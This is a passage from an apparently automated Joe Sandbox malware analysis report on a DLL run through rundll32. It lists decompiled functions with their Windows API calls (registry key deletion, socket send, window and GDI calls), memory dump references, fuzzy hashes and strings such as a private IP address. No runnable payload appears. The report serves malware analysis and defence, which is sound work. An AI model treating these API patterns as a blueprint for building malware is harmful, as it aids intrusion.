                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: System$Metrics$InfoParameters
                                                                                                                      • String ID: B$DISPLAY
                                                                                                                      • API String ID: 3136151823-3316187204
                                                                                                                      • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                      • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Edit
                                                                                                                      • API String ID: 0-554135844
                                                                                                                      • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                      • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10023C5A Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                      • SendMessageA.USER32 ref: 10023CD9
                                                                                                                      • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                      • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                      • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 187318432-0
                                                                                                                      • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                      • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016461 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 69039007-0
                                                                                                                      • Opcode ID: 085ceebb537b79095729454c239c812d1055ab42ca5db445185b2e3eb14481ee
                                                                                                                      • Instruction ID: a0330575091f1317eb55619662e3d715b8734a83444e0781f194cac9bf36f8e0
                                                                                                                      • Opcode Fuzzy Hash: 085ceebb537b79095729454c239c812d1055ab42ca5db445185b2e3eb14481ee
                                                                                                                      • Instruction Fuzzy Hash: 0B21D075D0025ADFDB21CB54CC417EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002B3A9 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                      • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                      • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                      • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002B437 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                      • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                      • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                      • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100203DD Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                      • _memset.LIBCMT ref: 10020424
                                                                                                                      • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                      • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 289641511-0
                                                                                                                      • Opcode ID: f79365a65109cbbcc9a6bbc28f9d7fd9ec1dc43e3c7e56829fb32e92ee025925
                                                                                                                      • Instruction ID: 4dbc6bba0439fa9bebd62d9ace19f6e6ac74746b4d7c1d87a51b75f8b83cd490
                                                                                                                      • Opcode Fuzzy Hash: f79365a65109cbbcc9a6bbc28f9d7fd9ec1dc43e3c7e56829fb32e92ee025925
                                                                                                                      • Instruction Fuzzy Hash: DA01DBB5600314ABE711DF64DEC4BDF77ADEF19341F404065F646D3142EAB09E448761
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100329FD Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                        • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                        • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                        • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                        • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                      • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                        • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                      • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                      • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2731880238-0
                                                                                                                      • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                      • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                      • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                      • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10012890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                      • SetWindowLongA.USER32 ref: 10012989
                                                                                                                        • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LongMenuWindow$AppendSystem
                                                                                                                      • String ID: 192.168.3.85$Message
                                                                                                                      • API String ID: 4121476972-856608562
                                                                                                                      • Opcode ID: a90c92772972697092915343de334961b3277e080dc7b5a44fb96fcdbf979901
                                                                                                                      • Instruction ID: 5cf2a2d3600ddfe9e3e75c53ffe40091173084dcd34b91a452ef246a626808d6
                                                                                                                      • Opcode Fuzzy Hash: a90c92772972697092915343de334961b3277e080dc7b5a44fb96fcdbf979901
                                                                                                                      • Instruction Fuzzy Hash: 12411B74A4020A9BDB04DB94CC52FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10013010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108memorynetworkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      • _strcat.LIBCMT ref: 1001310A
                                                                                                                        • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                      • String ID: :
                                                                                                                      • API String ID: 16450322-3653984579
                                                                                                                      • Opcode ID: 9ddd6bf09d0258533da1bacb9ba6165969689cc60440b7d914755c42b9ef06e0
                                                                                                                      • Instruction ID: 3ba3dcfd2515130731a8a819d4d55e20edbbe216b941dc915dfb352fa90348a6
                                                                                                                      • Opcode Fuzzy Hash: 9ddd6bf09d0258533da1bacb9ba6165969689cc60440b7d914755c42b9ef06e0
                                                                                                                      • Instruction Fuzzy Hash: F1412CB59001189FDB28DB64CC91BEEB775FF48304F1082ADE51AAB282DF346A84CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C1A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                        • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                        • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                      • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                      • API String ID: 3274081130-63838506
                                                                                                                      • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                      • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003CB01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                      • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                      • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100026D0 Relevance: 6.4, APIs: 5, Instructions: 118COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
